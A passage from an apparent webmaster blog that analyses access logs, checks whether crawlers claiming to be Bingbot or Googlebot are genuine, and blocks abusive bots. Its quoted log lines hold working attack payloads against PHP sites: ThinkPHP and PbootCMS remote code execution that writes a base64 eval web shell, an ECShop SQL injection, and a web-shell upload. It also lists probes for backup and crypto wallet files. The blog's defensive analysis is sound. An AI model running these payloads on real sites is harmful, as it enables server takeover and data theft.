5%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 8202 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:13 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:13 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbYmxibF0pPz5ibHNoZWxs)); HTTP/1.1" 200 8204 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:14 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 - - [15/Sep/2019:20:00:14 -0700] "POST //index.php?s=index HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 - - [15/Sep/2019:20:00:15 -0700] "GET //d.php HTTP/1.1" 404 419 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:19 -0700] "GET //i.php HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:19 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:289:\"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:20 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:24 -0700] "GET //index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW3NoZWxsXSk7Pz5ibHNoZWxs HTTP/1.1" 404 4698 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:24 -0700] "GET //uploadfile/member/0/0x0.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:29 -0700] "POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:33 -0700] "GET //index.php/list/5/?current={pboot:if(eval\\($_GET['a']))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydibCddKTsgPz5ibHNoZWxs')) HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:33 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:37 -0700] "POST //index.php?c=upload&f=save HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:41 -0700] "POST //index.php?g=Api&m=Plugin&a=fetch HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

MegaIndex.ru/2.0 megaindex.com/crawler

While examining the access.log at freefixer.com I found around 1000 hits from a bot named MegaIndex.ru operating from the 144.76.27.118 IP address:

144.76.27.118 - - [03/Sep/2019:23:15:50 -0700] "GET /library/file/hkcmd.exe-188/ HTTP/1.1" 200 19377 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"

Unfortunately, MegaIndex.ru’s crawler page does not clearly explain why it is a good idea to let the bot crawl my site. Nor does it clearly explain what user User-agent name to use in order to explicitly delay or disallow the bot. In addition to this, it sounds as the maximum value for Crawl-delay is 5 seconds.

I hope that the 5 seconds max value is just a typo. I’m going to try to slow down or block the bot with the following entries in robots.txt:

User-agent: MegaIndex.ru
Crawl-delay: 3600

or

User-agent: MegaIndex.ru
Disallow: /

I did a reverse IP lookup on 144.76.27.118 and the bot is running at clients.your-server.de.

144.76.27.118 reverse ip lookup

I tried a few geolocation services and all report that the 144.76.27.118 server is located in Germany.

Update 24 hours later: When checking the logs again I noticed that MegaCrawler had done more than 6000 requests. That is unacceptable. I’m blocking 144.76.27.118 in the .htaccess file.

66.249.79.159 – Googlebot/2.1

You can add 66.249.79.159 to your whitelist right away. 66.249.79.159 belongs to Google and the bot operating from there is the real GoogleBot.

If you prefer to verify that 66.249.79.159 belongs to Google, you can launch a command shell and do a reverse IP lookup on 66.249.79.159 and then a forward DNS lookup on the host name returned from the reverse lookup:

As you can see the reverse lookup returns a .googlebot.com address, and the forward DNS requests brings us back with 66.249.79.159. We can now conclude that 66.249.79.159 is a real Googlebot.

For the last days I’ve been going through all traffic on the Freefixer.com web site. My goal is to reduce the traffic to the web site by blocking a bunch for uninvited bots and crawlers. I’ll try to share some of the result here and I hope you’ll find it useful.

142.252.249.27 is Scanning for Crypto Wallets and Backups

Found a log entry from 142.252.249.27 this morning:

142.252.249.27 - - [09/Sep/2019:07:59:18 -0700] "HEAD /backup.zip HTTP/1.1" 404 4128 "http://www.freefixer.com/backup.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

The bot running at 142.252.249.27 is scanning freefixer.com for backups, databases, data, code, bitcoin wallets, bitcoin cash wallets, litecoin wallets, dogecoin wallets, etc. It looks for various file formats such as .zip, .rar, .dat, .7z, .sql, .mdb, .mdf, .tgz, .tar and .sql. Here’s the complete lite of requests that 142.252.249.27 did:

 HEAD /backup.zip
 HEAD /backup.rar
 HEAD /backup.dat
 HEAD /backup.7z
 HEAD /backup.sql
 HEAD /backup.mdb
 HEAD /backup.mdf
 HEAD /backup.tgz
 HEAD /backup.tar.gz
 HEAD /db.zip
 HEAD /db.rar
 HEAD /db.dat
 HEAD /db.7z
 HEAD /db.sql
 HEAD /db.mdb
 HEAD /db.mdf
 HEAD /db.tgz
 HEAD /db.tar.gz
 HEAD /web.zip
 HEAD /web.rar
 HEAD /web.dat
 HEAD /web.7z
 HEAD /web.sql
 HEAD /web.mdb
 HEAD /web.mdf
 HEAD /web.tgz
 HEAD /web.tar.gz
 HEAD /database.zip
 HEAD /database.rar
 HEAD /database.dat
 HEAD /database.7z
 HEAD /database.sql
 HEAD /database.mdb
 HEAD /database.mdf
 HEAD /database.tgz
 HEAD /database.tar.gz
 HEAD /data.zip
 HEAD /data.rar
 HEAD /data.dat
 HEAD /data.7z
 HEAD /data.sql
 HEAD /data.mdb
 HEAD /data.mdf
 HEAD /data.tgz
 HEAD /data.tar.gz
 HEAD /web.zip
 HEAD /web.rar
 HEAD /web.dat
 HEAD /web.7z
 HEAD /web.sql
 HEAD /web.mdb
 HEAD /web.mdf
 HEAD /web.tgz
 HEAD /web.tar.gz
 HEAD /wwwroot.zip
 HEAD /wwwroot.rar
 HEAD /wwwroot.dat
 HEAD /wwwroot.7z
 HEAD /wwwroot.sql
 HEAD /wwwroot.mdb
 HEAD /wwwroot.mdf
 HEAD /wwwroot.tgz
 HEAD /wwwroot.tar.gz
 HEAD /www.zip
 HEAD /www.rar
 HEAD /www.dat
 HEAD /www.7z
 HEAD /www.sql
 HEAD /www.mdb
 HEAD /www.mdf
 HEAD /www.tgz
 HEAD /www.tar.gz
 HEAD /code.zip
 HEAD /code.rar
 HEAD /code.dat
 HEAD /code.7z
 HEAD /code.sql
 HEAD /code.mdb
 HEAD /code.mdf
 HEAD /code.tgz
 HEAD /code.tar.gz
 HEAD /test.zip
 HEAD /test.rar
 HEAD /test.dat
 HEAD /test.7z
 HEAD /test.sql
 HEAD /test.mdb
 HEAD /test.mdf
 HEAD /test.tgz
 HEAD /test.tar.gz
 HEAD /admin.zip
 HEAD /admin.rar
 HEAD /admin.dat
 HEAD /admin.7z
 HEAD /admin.sql
 HEAD /admin.mdb
 HEAD /admin.mdf
 HEAD /admin.tgz
 HEAD /admin.tar.gz
 HEAD /user.zip
 HEAD /user.rar
 HEAD /user.dat
 HEAD /user.7z
 HEAD /user.sql
 HEAD /user.mdb
 HEAD /user.mdf
 HEAD /user.tgz
 HEAD /user.tar.gz
 HEAD /sql.zip
 HEAD /sql.rar
 HEAD /sql.dat
 HEAD /sql.7z
 HEAD /sql.sql
 HEAD /sql.mdb
 HEAD /sql.mdf
 HEAD /sql.tgz
 HEAD /sql.tar.gz
 HEAD /wallet.zip
 HEAD /wallet.rar
 HEAD /wallet.dat
 HEAD /wallet.7z
 HEAD /wallet.sql
 HEAD /wallet.mdb
 HEAD /wallet.mdf
 HEAD /wallet.tgz
 HEAD /wallet.tar.gz
 HEAD /wallet.backup.zip
 HEAD /wallet.backup.rar
 HEAD /wallet.backup.dat
 HEAD /wallet.backup.7z
 HEAD /wallet.backup.sql
 HEAD /wallet.backup.mdb
 HEAD /wallet.backup.mdf
 HEAD /wallet.backup.tgz
 HEAD /wallet.backup.tar.gz
 HEAD /litecoin.zip
 HEAD /litecoin.rar
 HEAD /litecoin.dat
 HEAD /litecoin.7z
 HEAD /litecoin.sql
 HEAD /litecoin.mdb
 HEAD /litecoin.mdf
 HEAD /litecoin.tgz
 HEAD /litecoin.tar.gz
 HEAD /Litecoin.zip
 HEAD /Litecoin.rar
 HEAD /Litecoin.dat
 HEAD /Litecoin.7z
 HEAD /Litecoin.sql
 HEAD /Litecoin.mdb
 HEAD /Litecoin.mdf
 HEAD /Litecoin.tgz
 HEAD /Litecoin.tar.gz
 HEAD /Bitcoin.zip
 HEAD /Bitcoin.rar
 HEAD /Bitcoin.dat
 HEAD /Bitcoin.7z
 HEAD /Bitcoin.sql
 HEAD /Bitcoin.mdb
 HEAD /Bitcoin.mdf
 HEAD /Bitcoin.tgz
 HEAD /Bitcoin.tar.gz
 HEAD /bitcoin.zip
 HEAD /bitcoin.rar
 HEAD /bitcoin.dat
 HEAD /bitcoin.7z
 HEAD /bitcoin.sql
 HEAD /bitcoin.mdb
 HEAD /bitcoin.mdf
 HEAD /bitcoin.tgz
 HEAD /bitcoin.tar.gz
 HEAD /HShare.zip
 HEAD /HShare.rar
 HEAD /HShare.dat
 HEAD /HShare.7z
 HEAD /HShare.sql
 HEAD /HShare.mdb
 HEAD /HShare.mdf
 HEAD /HShare.tgz
 HEAD /HShare.tar.gz
 HEAD /btc.zip
 HEAD /btc.rar
 HEAD /btc.dat
 HEAD /btc.7z
 HEAD /btc.sql
 HEAD /btc.mdb
 HEAD /btc.mdf
 HEAD /btc.tgz
 HEAD /btc.tar.gz
 HEAD /bch.zip
 HEAD /bch.rar
 HEAD /bch.dat
 HEAD /bch.7z
 HEAD /bch.sql
 HEAD /bch.mdb
 HEAD /bch.mdf
 HEAD /bch.tgz
 HEAD /bch.tar.gz
 HEAD /btm.zip
 HEAD /btm.rar
 HEAD /btm.dat
 HEAD /btm.mdb
 HEAD /btm.mdf
 HEAD /btm.tgz
 HEAD /btm.tar.gz
 HEAD /bcd.zip
 HEAD /bcd.rar
 HEAD /bcd.dat
 HEAD /bcd.7z
 HEAD /bcd.sql
 HEAD /bcd.mdb
 HEAD /bcd.mdf
 HEAD /bcd.tgz
 HEAD /bcd.tar.gz
 HEAD /bcx.zip
 HEAD /bcx.rar
 HEAD /bcx.dat
 HEAD /bcx.7z
 HEAD /bcx.sql
 HEAD /bcx.mdb
 HEAD /bcx.mdf
 HEAD /bcx.tgz
 HEAD /bcx.tar.gz
 HEAD /qianbao.zip
 HEAD /qianbao.rar
 HEAD /qianbao.dat
 HEAD /qianbao.7z
 HEAD /qianbao.sql
 HEAD /qianbao.mdb
 HEAD /qianbao.mdf
 HEAD /qianbao.tgz
 HEAD /qianbao.tar.gz
 HEAD /doge.zip
 HEAD /doge.rar
 HEAD /doge.dat
 HEAD /doge.7z
 HEAD /doge.sql
 HEAD /doge.mdb
 HEAD /doge.mdf
 HEAD /doge.tgz
 HEAD /doge.tar.gz
 HEAD /dogecoin.zip
 HEAD /dogecoin.rar
 HEAD /dogecoin.dat
 HEAD /dogecoin.7z
 HEAD /dogecoin.sql
 HEAD /dogecoin.mdb
 HEAD /dogecoin.mdf
 HEAD /dogecoin.tgz
 HEAD /dogecoin.tar.gz
 HEAD /backup.zip
 HEAD /backup.rar
 HEAD /backup.dat
 HEAD /backup.7z
 HEAD /backup.sql
 HEAD /backup.mdb
 HEAD /backup.mdf
 HEAD /backup.tgz
 HEAD /backup.tar.gz
 HEAD /db.zip
 HEAD /db.rar
 HEAD /db.dat
 HEAD /db.7z
 HEAD /db.sql
 HEAD /db.mdb
 HEAD /db.mdf
 HEAD /db.tgz
 HEAD /db.tar.gz
 HEAD /data.zip
 HEAD /data.rar
 HEAD /data.dat
 HEAD /data.7z
 HEAD /data.sql
 HEAD /data.mdb
 HEAD /data.mdf
 HEAD /data.tgz
 HEAD /data.tar.gz
 HEAD /web.zip
 HEAD /web.rar
 HEAD /web.dat
 HEAD /web.7z
 HEAD /web.sql
 HEAD /web.mdb
 HEAD /web.mdf
 HEAD /web.tgz
 HEAD /web.tar.gz
 HEAD /wwwroot.zip
 HEAD /wwwroot.rar
 HEAD /wwwroot.dat
 HEAD /wwwroot.7z
 HEAD /wwwroot.sql
 HEAD /wwwroot.mdb
 HEAD /wwwroot.mdf
 HEAD /wwwroot.tgz
 HEAD /wwwroot.tar.gz
 HEAD /database.zip
 HEAD /database.rar
 HEAD /database.dat
 HEAD /database.7z
 HEAD /database.sql
 HEAD /database.mdb
 HEAD /database.mdf
 HEAD /database.tgz
 HEAD /database.tar.gz
 HEAD /www.zip
 HEAD /www.rar
 HEAD /www.dat
 HEAD /www.7z
 HEAD /www.sql
 HEAD /www.mdb
 HEAD /www.mdf
 HEAD /www.tgz
 HEAD /www.tar.gz
 HEAD /code.zip
 HEAD /code.rar
 HEAD /code.dat
 HEAD /code.7z
 HEAD /code.sql
 HEAD /code.mdb
 HEAD /code.mdf
 HEAD /code.tgz
 HEAD /code.tar.gz
 HEAD /test.zip
 HEAD /test.rar
 HEAD /test.dat
 HEAD /test.7z
 HEAD /test.sql
 HEAD /test.mdb
 HEAD /test.mdf
 HEAD /test.tgz
 HEAD /test.tar.gz
 HEAD /admin.zip
 HEAD /admin.rar
 HEAD /admin.dat
 HEAD /admin.7z
 HEAD /admin.sql
 HEAD /admin.mdb
 HEAD /admin.mdf
 HEAD /admin.tgz
 HEAD /admin.tar.gz
 HEAD /user.zip
 HEAD /user.rar
 HEAD /user.dat
 HEAD /user.7z
 HEAD /user.sql
 HEAD /user.mdb
 HEAD /user.mdf
 HEAD /user.tgz
 HEAD /user.tar.gz
 HEAD /sql.zip
 HEAD /sql.rar
 HEAD /sql.dat
 HEAD /sql.7z
 HEAD /sql.sql
 HEAD /sql.mdb
 HEAD /sql.mdf
 HEAD /sql.tgz
 HEAD /sql.tar.gz
 HEAD /bf.zip
 HEAD /bf.rar
 HEAD /bf.dat
 HEAD /bf.7z
 HEAD /bf.sql
 HEAD /bf.mdb
 HEAD /bf.mdf
 HEAD /bf.tgz
 HEAD /bf.tar.gz
 HEAD /beifen.zip
 HEAD /beifen.rar
 HEAD /beifen.dat
 HEAD /beifen.7z
 HEAD /beifen.sql
 HEAD /beifen.mdb
 HEAD /beifen.mdf
 HEAD /beifen.tgz
 HEAD /beifen.tar.gz
 HEAD /shujuku.zip
 HEAD /shujuku.rar
 HEAD /shujuku.dat
 HEAD /shujuku.7z
 HEAD /shujuku.sql
 HEAD /shujuku.mdb
 HEAD /shujuku.mdf
 HEAD /shujuku.tgz
 HEAD /shujuku.tar.gz
 HEAD /shuju.zip
 HEAD /shuju.rar
 HEAD /shuju.dat
 HEAD /shuju.7z
 HEAD /shuju.sql
 HEAD /shuju.mdb
 HEAD /shuju.mdf
 HEAD /shuju.tgz
 HEAD /shuju.tar.gz
 HEAD /ziliao.zip
 HEAD /ziliao.rar
 HEAD /ziliao.dat
 HEAD /ziliao.7z
 HEAD /ziliao.sql
 HEAD /ziliao.mdb
 HEAD /ziliao.mdf
 HEAD /ziliao.tgz
 HEAD /ziliao.tar.gz
 HEAD /freefixer.zip
 HEAD /freefixer.com.zip
 HEAD /www.freefixer.com.zip
 HEAD /freefixer.rar
 HEAD /freefixer.com.rar
 HEAD /www.freefixer.com.rar
 HEAD /freefixer.dat
 HEAD /freefixer.com.dat
 HEAD /www.freefixer.com.dat
 HEAD /freefixer.7z
 HEAD /freefixer.com.7z
 HEAD /www.freefixer.com.7z
 HEAD /freefixer.sql
 HEAD /freefixer.com.sql
 HEAD /www.freefixer.com.sql
 HEAD /freefixer.mdb
 HEAD /freefixer.com.mdb
 HEAD /www.freefixer.com.mdb
 HEAD /freefixer.mdf
 HEAD /freefixer.com.mdf
 HEAD /www.freefixer.com.mdf
 HEAD /freefixer.tgz
 HEAD /freefixer.com.tgz
 HEAD /www.freefixer.com.tgz
 HEAD /freefixer.tar.gz
 HEAD /freefixer.com.tar.gz
 HEAD /www.freefixer.com.tar.gz

Vanta Telecommunications Limited and egihosting.com are names that shows up then I did a lookup in ARIN register, as shown in the screenshot below. I’m assuming one of their customers have been hacked.

If you’ve been following this blog for the last week you know that I’ve been trying to weed out fake Bingbots, Yandexbots and Googlebots and other types of bad behaviour. Since 142.252.249.27 is currently trying to gain access to non-public information I’m going to block it in Apache’s .htaccess file.

91.121.209.150 – Apache-HttpClient/4.5.5 (Java/1.8.0_101)

I’m currently following up on some of the most frequent visitors at Freefixer.com. This time it’s 91.121.209.150, with the user agent set to Apache-HttpClient/4.5.5 (Java/1.8.0_101).

Unfortunately this bot does not give any details on why they are crawling Freefixer.com and who is operating the bot. All I know is that it downloads one of the .RSS feeds and then start downloading all pages that the .RSS links to with a few seconds delay.

91.121.209.150 - - [07/Sep/2019:16:50:51 -0700] "GET /library/file/295790/ HTTP/1.1" 301 3551 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

 91.121.209.150 - - [07/Sep/2019:16:50:52 -0700] "GET /library/file/esrv_svc.exe-295790/ HTTP/1.1" 200 18461 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

 91.121.209.150 - - [07/Sep/2019:16:50:56 -0700] "GET /library/file/295789/ HTTP/1.1" 301 559 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

 91.121.209.150 - - [07/Sep/2019:16:50:57 -0700] "GET /library/file/soffice.exe-295789/ HTTP/1.1" 200 18666 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

 91.121.209.150 - - [07/Sep/2019:16:50:57 -0700] "GET /library/file/295788/ HTTP/1.1" 301 562 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

 91.121.209.150 - - [07/Sep/2019:16:50:58 -0700] "GET /library/file/QHSafeTray.exe-295788/ HTTP/1.1" 200 25845 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

The reverse IP lookup returns an ovh.net address. OVH is a company that offers web hosting, servers and cloud solutions:

91.121.209.150 appears to be located in France, near the border to Belgium.

207.46.13.179 – bingbot/2.0

Recently I’ve been fixing some performance issues due to the behaviour of some web bots. If you are concerned about 207.46.13.179, I’ll let you right away that this a legitimate Bingbot. Here’s an example from the HTTP access log:

207.46.13.179 - - [04/Sep/2019:21:53:15 -0700] "GET /library/file/mustangser532.exe-206653/ HTTP/1.1" 301 4303 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

207.46.13.179 is requesting content from Freefixer.com approximately every 10 seconds. Quite often, but that’s OK. I would like Freefixer.com to appear at bing.com.

So, how do I know that this in fact is a real Bingbot, and not some unwanted program that scrapes my web site? I’ll use the same procedure as recommended over at Bing Webmasters Tools. That is, a reverse IP lookup on the IP address, and then a forward IP lookup on the results from the reverse lookup. If you end up with the same IP that you started with, and the reverse lookup reports a search.msn.com, you can rest assured that you are dealing with a legitimate bingbot.

207.46.13.179 is the real Bingbot from Microsoft

If you do an ARIN lookup on 207.46.13.179, you’ll see that Microsoft owns the range starting from 207.46.0.0 to 207.46.255.255. So I assume you can expect bingbots from all the IP addresses.

GoogleBot, BingBot – Is That Crawler Real or Fake?

I’m currently running FreeFixer.com on a shared Dreamhost server. Dreamhost has a monitoring service that  keeps an eye on the total resource usage for each user account. If some user consumes to much resources on the server, the monitoring service starts killing off processes for that user and an email report is sent. This is great since it saves me much of the performance problems caused by other users on the same server.

Some time ago, the resource usage for freefixer.com started hitting the limit but I didn’t notice any additional traffic when I examined the Google Analytics report. This led me to investigate Apache’s access.log file. Here are two example entries from the log:

157.55.39.252 - - [25/Jun/2019:02:37:05 -0700] "GET /library/file/UninstallTP.exe-154295/ HTTP/1.1" 200 17986 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
163.172.64.171 - - [25/Jun/2019:02:37:10 -0700] "GET /b/tag/fake-flash-software/ HTTP/1.1" 200 18719 "-" "Barkrowler/0.9 (+http://www.exensa.com/crawl)"

The first entry (157.55.39.252) claims to be the bingbot and the second (163.172.64.171) is a crawler called Barkrowler (exensa.com).

When examining the access.log a bunch of questions are raised:

  1. Let’s say the crawler claims to be BingBot or GoogleBot, but is it the real one coming from one of Google’s or Microsoft’s data centers, or is it a bot that falsely set its user agent to GoogleBot or BingBot?
  2. What about all the other bots out there? Their crawling uses quite a lot of resources, but do they bring any value or users to your web site.
  3. What about all the other high usage IP-numbers that claims to be ordinary users? Are their claims correct, or are they just bots in disguise?

I’ll simply post each IP number that I investigate below and you can check out the details by clicking on it. You can find the list down below.

How To Determine If a Bot is Fake

Let’s say you see an entry in the log coming from 157.55.39.252 and it claims to be bingbot. How can we determine that the traffic is from a real bingbot? We can do this using the following two steps:

1) First we do a reverse DNS lookup using the IP from the log.

$ host 157.55.39.252

252.39.55.157.in-addr.arpa domain name pointer msnbot-157-55-39-252.search.msn.com.

The DNS responds with [msnbot-157-55-39-252.search.msn.com].

2) Then we do a forward DNS lookup on the hostname we got from the reverse lookup.

$ dig +short msnbot-157-55-39-252.search.msn.com

157.55.39.252

So, to summarise: 157.55.39.252 points to [msnbot-157-55-39-252.search.msn.com] which is owned by Microsoft. And the [msnbot-157-55-39-252.search.msn.com] hostname resolves back to 157.55.39.252 which we started with. Excellent, we now know that we are dealing with a legitimate bingbot.

Another way to check if an IP belongs to bingbot, if you don’t have the host and dig command line tools available, is to use Bing’s Verify Bingbot Tool. You simply type in the IP address, in this case 157.55.39.252, and solve the captcha.

Verify bingbot tool reports 157.55.39.252 is a real bingbot
Verify bingbot for 157.55.39.252

I’m not aware of web verification tools for the other search engines such as Google or Yandex. If you know about such a tool, please let me know.

IP Addresses